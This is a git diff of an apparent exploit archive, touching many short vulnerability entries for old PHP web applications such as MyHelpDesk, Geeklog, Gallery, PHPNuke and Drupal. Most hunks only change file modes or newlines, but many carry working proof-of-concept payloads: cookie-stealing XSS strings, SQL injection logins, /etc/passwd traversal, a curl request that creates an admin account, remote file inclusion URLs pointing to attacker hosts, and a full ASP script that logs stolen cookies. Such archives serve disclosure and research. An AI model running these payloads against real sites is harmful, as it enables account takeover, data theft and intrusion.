Reportedly, it These issues have been reported in version 0.7 of CBMS. Other versions may share these vulnerabilities, this has not however been confirmed. -dltclnt.php?choice=yes&idnum=clientid \ No newline at end of file +dltclnt.php?choice=yes&idnum=clientid \ No newline at end of file diff --git a/platforms/php/webapps/21519.txt b/platforms/php/webapps/21519.txt old mode 100755 new mode 100644 index b0b22238a..7b6a98f86 --- a/platforms/php/webapps/21519.txt +++ b/platforms/php/webapps/21519.txt @@ -6,4 +6,4 @@ MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users. -&lt;script src="http://forum.olympos.org/f.js">Alper&lt;/script&gt; \ No newline at end of file +&lt;script src="http://forum.olympos.org/f.js">Alper&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/21521.txt b/platforms/php/webapps/21521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21524.txt b/platforms/php/webapps/21524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21525.txt b/platforms/php/webapps/21525.txt old mode 100755 new mode 100644 index 98c67336a..1ba9d5c79 --- a/platforms/php/webapps/21525.txt +++ b/platforms/php/webapps/21525.txt @@ -7,4 +7,4 @@ This may enable a remote attacker to steal cookie-based authentication credentia This issue has been reported to exist in Geeklog 1.3.5, earlier versions may also be susceptible to this issue. /index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt; -/comment.php?mode=display&sid=foo&pid=18&title=&lt;script&gt;alert(document.cookie)&lt;/script&gt;&type=article \ No newline at end of file +/comment.php?mode=display&sid=foo&pid=18&title=&lt;script&gt;alert(document.cookie)&lt;/script&gt;&type=article \ No newline at end of file diff --git a/platforms/php/webapps/21526.txt b/platforms/php/webapps/21526.txt old mode 100755 new mode 100644 index 1db6b1947..25907435f --- a/platforms/php/webapps/21526.txt +++ b/platforms/php/webapps/21526.txt @@ -4,4 +4,4 @@ It is reported that MyHelpDesk is vulnerable to cross-site scripting attacks. Attackers may exploit this vulnerability by constructing a link to a vulnerable scripts, passing malicious HTML code as a value for unsanitized CGI parameters. If the link is sent to a MyHelpDesk user and clicked on, the attacker-supplied HTML code will run in the context of the site running the vulnerable software. -http://[TARGET]/supporter/index.php?t=tickettime&id=&lt;script&gt;alert(document.cookie)&lt;/script&gt; \ No newline at end of file +http://[TARGET]/supporter/index.php?t=tickettime&id=&lt;script&gt;alert(document.cookie)&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/21527.txt b/platforms/php/webapps/21527.txt old mode 100755 new mode 100644 index c84731aad..d2f0f81d2 --- a/platforms/php/webapps/21527.txt +++ b/platforms/php/webapps/21527.txt @@ -4,4 +4,4 @@ It is reported that MyHelpDesk (version 20020509 and earlier) are vulnerable to Data supplied by the remote user, via CGI parameters, is used directly as part of SQL statements. As input sanitization is not properly performed, it is possible to modify the logic of a SQL query. -http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me \ No newline at end of file +http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me \ No newline at end of file diff --git a/platforms/php/webapps/21528.txt b/platforms/php/webapps/21528.txt old mode 100755 new mode 100644 index 9e1a48a00..801968d71 --- a/platforms/php/webapps/21528.txt +++ b/platforms/php/webapps/21528.txt @@ -4,4 +4,4 @@ Geeklog does not sufficiently sanitize script code from form fields, making it p Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website. -Link input($url) :&lt;scriptsrc="http://forum.olympos.org/f.js">Alper&lt;/script&gt; \ No newline at end of file +Link input($url) :&lt;scriptsrc="http://forum.olympos.org/f.js">Alper&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/21529.txt b/platforms/php/webapps/21529.txt old mode 100755 new mode 100644 index 4549d76fe..3bfae4507 --- a/platforms/php/webapps/21529.txt +++ b/platforms/php/webapps/21529.txt @@ -4,4 +4,4 @@ W-Agora is prone to an issue which may allow an attacker to include arbitrary fi If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code. -http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt \ No newline at end of file +http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt \ No newline at end of file diff --git a/platforms/php/webapps/2153.txt b/platforms/php/webapps/2153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2154.txt b/platforms/php/webapps/2154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2155.txt b/platforms/php/webapps/2155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21552.txt b/platforms/php/webapps/21552.txt old mode 100755 new mode 100644 index 1010ba88d..c1567623a --- a/platforms/php/webapps/21552.txt +++ b/platforms/php/webapps/21552.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/5022/info PHP Classifieds has been reported to be prone to cross-site scripting attacks. Attackers may inject arbitrary HTML or script code into URI parameters in a malicious link. When the malicious link is visited, the attacker's script code will be executed in the web client of the user browsing the link, in the security context of the website hosting the vulnerable software. -http://target/phpclassifieds/latestwap.php?url=<script>alert('OopS');< \ No newline at end of file +http://target/phpclassifieds/latestwap.php?url=<script>alert('OopS');< \ No newline at end of file diff --git a/platforms/php/webapps/21557.txt b/platforms/php/webapps/21557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21563.txt b/platforms/php/webapps/21563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21564.txt b/platforms/php/webapps/21564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2157.txt b/platforms/php/webapps/2157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21570.txt b/platforms/php/webapps/21570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2158.txt b/platforms/php/webapps/2158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21590.txt b/platforms/php/webapps/21590.txt old mode 100755 new mode 100644 index 7e92be4c2..cd8909d1c --- a/platforms/php/webapps/21590.txt +++ b/platforms/php/webapps/21590.txt @@ -6,4 +6,4 @@ A flaw in /admin/login.php has been reported in PHPAuction, which could allow us Submitting authentication credentials via login.php will create the user account with adminsitrative permissions. -curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test" \ No newline at end of file +curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test" \ No newline at end of file diff --git a/platforms/php/webapps/21610.txt b/platforms/php/webapps/21610.txt old mode 100755 new mode 100644 index bb99d7668..3f0e80675 --- a/platforms/php/webapps/21610.txt +++ b/platforms/php/webapps/21610.txt @@ -11,4 +11,4 @@ http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:. or -http://<Serverip:port>/content/base/build/explorer/none.php?/etc/passwd \ No newline at end of file +http://<Serverip:port>/content/base/build/explorer/none.php?/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/21622.txt b/platforms/php/webapps/21622.txt old mode 100755 new mode 100644 index 6f20dcd60..3be9dda9e --- a/platforms/php/webapps/21622.txt +++ b/platforms/php/webapps/21622.txt @@ -4,4 +4,4 @@ PHP-Wiki does not sufficiently sanitize HTML from URI parameters, making it pron PHP-Wiki may be used as a module for other software such as PostNuke. -http://target/path/modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert(document.cookie)</script> \ No newline at end of file +http://target/path/modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/21628.txt b/platforms/php/webapps/21628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2163.txt b/platforms/php/webapps/2163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21640.txt b/platforms/php/webapps/21640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2165.txt b/platforms/php/webapps/2165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2166.txt b/platforms/php/webapps/2166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21660.txt b/platforms/php/webapps/21660.txt old mode 100755 new mode 100644 index b270d7a46..fcb3e1a9d --- a/platforms/php/webapps/21660.txt +++ b/platforms/php/webapps/21660.txt @@ -4,4 +4,4 @@ phpBB2 is an open-source web forum application that is written in PHP and backen Gender Mod is a modification for phpBB2 which allows the association of a gender with a given user profile. A SQL injection vulnerability has been reported in this mod. A remote user may subvert the SQL statement used to update their user profile, possibly gaining administrative access to the system. -"0, user_level = 1 " \ No newline at end of file +"0, user_level = 1 " \ No newline at end of file diff --git a/platforms/php/webapps/21661.txt b/platforms/php/webapps/21661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21665.txt b/platforms/php/webapps/21665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21668.txt b/platforms/php/webapps/21668.txt old mode 100755 new mode 100644 index 64f42a595..90ba4b5c7 --- a/platforms/php/webapps/21668.txt +++ b/platforms/php/webapps/21668.txt @@ -4,4 +4,4 @@ shoutBOX does not sufficiently sanitize HTML tags from input supplied via form f In the Site URL text box, type in: -"></a><html code goes here><a href=" \ No newline at end of file +"></a><html code goes here><a href=" \ No newline at end of file diff --git a/platforms/php/webapps/2167.txt b/platforms/php/webapps/2167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21676.txt b/platforms/php/webapps/21676.txt old mode 100755 new mode 100644 index 8a9321da9..6285ede02 --- a/platforms/php/webapps/21676.txt +++ b/platforms/php/webapps/21676.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/5375/info Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter. -http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/ \ No newline at end of file +http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/ \ No newline at end of file diff --git a/platforms/php/webapps/2168.txt b/platforms/php/webapps/2168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2169.txt b/platforms/php/webapps/2169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2170.txt b/platforms/php/webapps/2170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21708.txt b/platforms/php/webapps/21708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2171.txt b/platforms/php/webapps/2171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21715.txt b/platforms/php/webapps/21715.txt old mode 100755 new mode 100644 index ccbbea7ab..c8b48aa33 --- a/platforms/php/webapps/21715.txt +++ b/platforms/php/webapps/21715.txt @@ -48,6 +48,4 @@ Exploit: _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - - \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/21716.txt b/platforms/php/webapps/21716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2172.txt b/platforms/php/webapps/2172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21723.txt b/platforms/php/webapps/21723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21724.txt b/platforms/php/webapps/21724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21727.txt b/platforms/php/webapps/21727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2173.txt b/platforms/php/webapps/2173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2174.txt b/platforms/php/webapps/2174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21740.txt b/platforms/php/webapps/21740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21742.txt b/platforms/php/webapps/21742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21743.txt b/platforms/php/webapps/21743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21745.txt b/platforms/php/webapps/21745.txt old mode 100755 new mode 100644 index 54468e7d9..a1acbdc1d --- a/platforms/php/webapps/21745.txt +++ b/platforms/php/webapps/21745.txt @@ -11,4 +11,4 @@ Create the following text file (ls.txt) and store it on the attacker host where And cause the vulnerable script on the victim host to invoke it with the following request: -http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt? \ No newline at end of file +http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt? \ No newline at end of file diff --git a/platforms/php/webapps/2175.txt b/platforms/php/webapps/2175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21755.txt b/platforms/php/webapps/21755.txt old mode 100755 new mode 100644 index 126485ebb..75b0b313c --- a/platforms/php/webapps/21755.txt +++ b/platforms/php/webapps/21755.txt @@ -4,4 +4,4 @@ php(Reactor) does not sufficiently sanitize HTML from various fields (such as in An attacker may potentially exploit this situation to cause arbitrary HTML and script code to execute in the web client of a user of a vulnerable website. The attacker-supplied code will execute in the context of the vulnerable website. -<b style="expression(alert(document.cookie))"> \ No newline at end of file +<b style="expression(alert(document.cookie))"> \ No newline at end of file diff --git a/platforms/php/webapps/2177.txt b/platforms/php/webapps/2177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21776.txt b/platforms/php/webapps/21776.txt old mode 100755 new mode 100644 index 039dbd10e..4a00eb52d --- a/platforms/php/webapps/21776.txt +++ b/platforms/php/webapps/21776.txt @@ -7,4 +7,4 @@ It has been reported that a vulnerability in the PHP header function exists. It http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F %6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64% 6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%2 -1%2D%2D \ No newline at end of file +1%2D%2D \ No newline at end of file diff --git a/platforms/php/webapps/21778.txt b/platforms/php/webapps/21778.txt old mode 100755 new mode 100644 index 032fdb5ac..6567424e6 --- a/platforms/php/webapps/21778.txt +++ b/platforms/php/webapps/21778.txt @@ -8,4 +8,4 @@ If magic_quotes_gpc is not enabled, then it will be possible for attackers to mo Use an existing administrator name (default is admin) and use the following password: -"' OR 'a'='a" \ No newline at end of file +"' OR 'a'='a" \ No newline at end of file diff --git a/platforms/php/webapps/21779.txt b/platforms/php/webapps/21779.txt old mode 100755 new mode 100644 index 5bc17af13..83d286e7c --- a/platforms/php/webapps/21779.txt +++ b/platforms/php/webapps/21779.txt @@ -5,4 +5,4 @@ WoltLab is prone to SQL injection attacks. This is due to insufficient sanitizat The logic of a SQL query made by the script may be modified, resulting in the potential for database corruption. It has been demonstrated that it is possible to exploit this condition to gain administrative privileges within the bulletin board system. board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is -usually an admin]&sid=[attackers session-id] \ No newline at end of file +usually an admin]&sid=[attackers session-id] \ No newline at end of file diff --git a/platforms/php/webapps/2178.php b/platforms/php/webapps/2178.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21780.txt b/platforms/php/webapps/21780.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21783.txt b/platforms/php/webapps/21783.txt old mode 100755 new mode 100644 index 2a005e5fd..00bebe288 --- a/platforms/php/webapps/21783.txt +++ b/platforms/php/webapps/21783.txt @@ -11,4 +11,4 @@ Content-Length: 123\n dbpassword=%22%3Bphpinfo%28%29%3B%24a%3D%22&toolbar=1 &messenger=1&smileys=1&title=1&db_session_handler=0 &all_in_one=0&test=\n -\n \ No newline at end of file +\n \ No newline at end of file diff --git a/platforms/php/webapps/21786.php b/platforms/php/webapps/21786.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21809.txt b/platforms/php/webapps/21809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21811.txt b/platforms/php/webapps/21811.txt old mode 100755 new mode 100644 index 3d8073d47..f44ab016b --- a/platforms/php/webapps/21811.txt +++ b/platforms/php/webapps/21811.txt @@ -23,4 +23,4 @@ SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('b oop!')</script>&submit=Search http://<VULNERABLE -SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script> \ No newline at end of file +SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script> \ No newline at end of file diff --git a/platforms/php/webapps/21817.txt b/platforms/php/webapps/21817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2182.txt b/platforms/php/webapps/2182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21825.txt b/platforms/php/webapps/21825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21829.txt b/platforms/php/webapps/21829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2183.txt b/platforms/php/webapps/2183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2184.txt b/platforms/php/webapps/2184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21855.txt b/platforms/php/webapps/21855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21859.txt b/platforms/php/webapps/21859.txt old mode 100755 new mode 100644 index 00f490d66..d4a11ddc4 --- a/platforms/php/webapps/21859.txt +++ b/platforms/php/webapps/21859.txt @@ -4,4 +4,4 @@ Problems with PHPNuke could make it possible to execute arbitrary script code in PHPNuke does not sufficiently filter potentially malicious HTML code from news posts. As a result, when a user views a news posting that contains malicious HTML code, the code contained in the posted message would be executed in the browser of the vulnerable user. This will occur in the context of the site running the PHPNuke software. -<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file +<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file diff --git a/platforms/php/webapps/21860.txt b/platforms/php/webapps/21860.txt old mode 100755 new mode 100644 index e357c863a..596aa51a2 --- a/platforms/php/webapps/21860.txt +++ b/platforms/php/webapps/21860.txt @@ -4,4 +4,4 @@ Problems with NPDS could make it possible to execute arbitrary script code in a NPDS does not sufficiently filter potentially malicious HTML code from news posts. As a result, when a user views a news posting that contains malicious HTML code, the code contained in the posted message would be executed in the browser of the vulnerable user. This will occur in the context of the site running the NPDS software. -<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file +<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file diff --git a/platforms/php/webapps/21861.txt b/platforms/php/webapps/21861.txt old mode 100755 new mode 100644 index 45d4a10b5..58c9ed9a5 --- a/platforms/php/webapps/21861.txt +++ b/platforms/php/webapps/21861.txt @@ -4,4 +4,4 @@ Problems with DaCode could make it possible to execute arbitrary script code in DaCode does not sufficiently filter potentially malicious HTML code from news posts. As a result, when a user views a news posting that contains malicious HTML code, the code contained in the posted message would be executed in the browser of the vulnerable user. This will occur in the context of the site running the DaCode software. -<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file +<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file diff --git a/platforms/php/webapps/21862.txt b/platforms/php/webapps/21862.txt old mode 100755 new mode 100644 index 165236f8d..a6aca91dc --- a/platforms/php/webapps/21862.txt +++ b/platforms/php/webapps/21862.txt @@ -9,4 +9,4 @@ This issue could result in a denial of service attack or the corruption of datab This issue was reported in PHPNuke version 6.0. Other versions may also be affected. http://www.nukesite.com/modules.php?name=News&file=article&sid=1234%20or% -201=1 \ No newline at end of file +201=1 \ No newline at end of file diff --git a/platforms/php/webapps/21863.txt b/platforms/php/webapps/21863.txt old mode 100755 new mode 100644 index 8da0f7b14..93db4983a --- a/platforms/php/webapps/21863.txt +++ b/platforms/php/webapps/21863.txt @@ -4,4 +4,4 @@ Problems with Drupal could allow an attacker to execute arbitrary script code in Drupal fails to sufficiently filter potentially malicious HTML code from news posts. As a result, when a user views a news posting that contains malicious HTML code, the code contained in the posted message would be executed in their browser. This will occur in the context of the site running the Drupal software. -<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file +<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file diff --git a/platforms/php/webapps/21864.txt b/platforms/php/webapps/21864.txt old mode 100755 new mode 100644 index 29f83baef..fece63288 --- a/platforms/php/webapps/21864.txt +++ b/platforms/php/webapps/21864.txt @@ -4,4 +4,4 @@ Problems with phpWebSite could make it possible to execute arbitrary script code phpWebSite does not sufficiently filter potentially malicious HTML code from news posts. As a result, when a user views a news posting that contains malicious HTML code, the code contained in the posted message would be executed in the browser of the vulnerable user. This will occur in the context of the site running the phpWebSite software. -<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file +<IMG SRC="javascript:alert('unsecure')"> \ No newline at end of file diff --git a/platforms/php/webapps/2187.htm b/platforms/php/webapps/2187.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21873.txt b/platforms/php/webapps/21873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21874.txt b/platforms/php/webapps/21874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2188.txt b/platforms/php/webapps/2188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21886.txt b/platforms/php/webapps/21886.txt old mode 100755 new mode 100644 index bd7555f63..90eb41a3d --- a/platforms/php/webapps/21886.txt +++ b/platforms/php/webapps/21886.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for Py-Membres 3.1 that allows remote attacker Reportedly, Py-Membres does not fully check some URI parameters. Thus it is possible for an attacker to manipulate URI parameters and log into the system as an arbitrary user without the need for passwords. -http://[target]/index.php?pymembs=admin \ No newline at end of file +http://[target]/index.php?pymembs=admin \ No newline at end of file diff --git a/platforms/php/webapps/2189.txt b/platforms/php/webapps/2189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21890.txt b/platforms/php/webapps/21890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21891.txt b/platforms/php/webapps/21891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21893.php b/platforms/php/webapps/21893.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21894.txt b/platforms/php/webapps/21894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21896.txt b/platforms/php/webapps/21896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21899.txt b/platforms/php/webapps/21899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2190.txt b/platforms/php/webapps/2190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21900.txt b/platforms/php/webapps/21900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21901.txt b/platforms/php/webapps/21901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21903.txt b/platforms/php/webapps/21903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21905.txt b/platforms/php/webapps/21905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21906.txt b/platforms/php/webapps/21906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2191.txt b/platforms/php/webapps/2191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21912.txt b/platforms/php/webapps/21912.txt old mode 100755 new mode 100644 index 30ba0bc84..c1956f91e --- a/platforms/php/webapps/21912.txt +++ b/platforms/php/webapps/21912.txt @@ -9,4 +9,4 @@ http://[target]/vars.inc and -http://[target]/protection.php?mode=display&username=[LOGIN]&password=[PASSWORD] \ No newline at end of file +http://[target]/protection.php?mode=display&username=[LOGIN]&password=[PASSWORD] \ No newline at end of file diff --git a/platforms/php/webapps/21918.html b/platforms/php/webapps/21918.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2192.txt b/platforms/php/webapps/2192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21921.txt b/platforms/php/webapps/21921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21930.txt b/platforms/php/webapps/21930.txt old mode 100755 new mode 100644 index 8fdc06623..92cc77bdb --- a/platforms/php/webapps/21930.txt +++ b/platforms/php/webapps/21930.txt @@ -8,4 +8,4 @@ This may allow for theft of cookie-based authentication credentials from legitim This issue has been reported in php(Reactor) version 1.2.7pl1. Other versions may also be affected. -http://www.example.com/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('test');</script> \ No newline at end of file +http://www.example.com/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('test');</script> \ No newline at end of file diff --git a/platforms/php/webapps/21931.txt b/platforms/php/webapps/21931.txt old mode 100755 new mode 100644 index 64a9e7d6e..917842d25 --- a/platforms/php/webapps/21931.txt +++ b/platforms/php/webapps/21931.txt @@ -4,4 +4,4 @@ phpBBmod ships with a sample script (phpinfo.php) that may disclosure sensitive This issue was reported in phpBBmod version 1.3.3. Other versions may also be affected. -http://www.example.com/phpBB/phpinfo.php \ No newline at end of file +http://www.example.com/phpBB/phpinfo.php \ No newline at end of file diff --git a/platforms/php/webapps/21933.txt b/platforms/php/webapps/21933.txt old mode 100755 new mode 100644 index a4be8b8cd..db335c64e --- a/platforms/php/webapps/21933.txt +++ b/platforms/php/webapps/21933.txt @@ -4,4 +4,4 @@ phpRank is a freely available web site link sharing script. It is available for It has been reported that phpRank is vulnerable to cross-site scripting attacks. Under some circumstances, it is possible to force the rendering of arbitrary HTML and script code through the add.php portion of the phpRank package. This could allow the execution of potentially malicious script and HTML in the security context of a vulnerable site. -http://example.com/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(42)%3C/script%3E \ No newline at end of file +http://example.com/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(42)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/21950.txt b/platforms/php/webapps/21950.txt old mode 100755 new mode 100644 index 17c97c8bf..dfcb7db86 --- a/platforms/php/webapps/21950.txt +++ b/platforms/php/webapps/21950.txt @@ -10,4 +10,4 @@ http://example.com/forums/index.php?board=;action=login2&user=USERNAME&cookielen An ASP script was also provided which will receive stolen cookie-based authentication credentials. -------------------------------- hack.asp ------------------------------------ <% Option Explicit Const ForWriting = 2 Const ForAppending = 8 Const Create = True Dim MyFile Dim FSO ' FileSystemObject Dim TSO ' TextStreamObject Dim Str Str = Request.ServerVariables("QUERY_STRING") MyFile = Server.MapPath("./db/log.txt") Set FSO = Server.CreateObject("Scripting.FileSystemObject") Set TSO = FSO.OpenTextFile(MyFile, ForAppending, Create) if (Str <> "") then TSO.WriteLine Str TSO.close Set TSO = Nothing Set FSO = Nothing %> You have just been hacked. ----------------------------------- EOF ----------------------------------- \ No newline at end of file +------------------------------- hack.asp ------------------------------------ <% Option Explicit Const ForWriting = 2 Const ForAppending = 8 Const Create = True Dim MyFile Dim FSO ' FileSystemObject Dim TSO ' TextStreamObject Dim Str Str = Request.ServerVariables("QUERY_STRING") MyFile = Server.MapPath("./db/log.txt") Set FSO = Server.CreateObject("Scripting.FileSystemObject") Set TSO = FSO.OpenTextFile(MyFile, ForAppending, Create) if (Str <> "") then TSO.WriteLine Str TSO.close Set TSO = Nothing Set FSO = Nothing %> You have just been hacked. ----------------------------------- EOF ----------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/21956.txt b/platforms/php/webapps/21956.txt old mode 100755 new mode 100644 index 8348259ad..309d6db30 --- a/platforms/php/webapps/21956.txt +++ b/platforms/php/webapps/21956.txt @@ -4,4 +4,4 @@ kmMail does not sufficiently sanitize HTML and script code from the body of e-ma This may allow an attacker to steal cookie-based authentication credentials from users of the webmail system. Other attacks are also possible. -<b onMouseOver="alert(document.location)">bolder</b> \ No newline at end of file +<b onMouseOver="alert(document.location)">bolder</b> \ No newline at end of file diff --git a/platforms/php/webapps/21957.txt b/platforms/php/webapps/21957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2196.txt b/platforms/php/webapps/2196.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21960.txt b/platforms/php/webapps/21960.txt old mode 100755 new mode 100644 index 5deab4808..413c30053 --- a/platforms/php/webapps/21960.txt +++ b/platforms/php/webapps/21960.txt @@ -6,4 +6,4 @@ It has been reported that it is possible for an unauthorized attacker to gain ad Exploiting this issue could allow unauthorized attackers to execute arbitrary administrative actions against the target guestbook, such as corrupt valid user supplied entries. -http://[Target]/gb/index.php?login=true \ No newline at end of file +http://[Target]/gb/index.php?login=true \ No newline at end of file diff --git a/platforms/php/webapps/21961.txt b/platforms/php/webapps/21961.txt old mode 100755 new mode 100644 index 6a630b8ba..1462c84de --- a/platforms/php/webapps/21961.txt +++ b/platforms/php/webapps/21961.txt @@ -6,4 +6,4 @@ HTML tags and script code are not sanitized from CGI variables which may cause u When this link is visited, the attacker-supplied code will execute in the user's web client in the security context of the site hosting the software. -http://www.example.com/templates/form_header.php?noticemsg=<Script>javascript:alert(document.cookie)</Script> \ No newline at end of file +http://www.example.com/templates/form_header.php?noticemsg=<Script>javascript:alert(document.cookie)</Script> \ No newline at end of file diff --git a/platforms/php/webapps/21967.txt b/platforms/php/webapps/21967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21968.txt b/platforms/php/webapps/21968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21969.txt b/platforms/php/webapps/21969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21970.txt b/platforms/php/webapps/21970.txt old mode 100755 new mode 100644 index 0a564eac8..88c925ee0 --- a/platforms/php/webapps/21970.txt +++ b/platforms/php/webapps/21970.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. 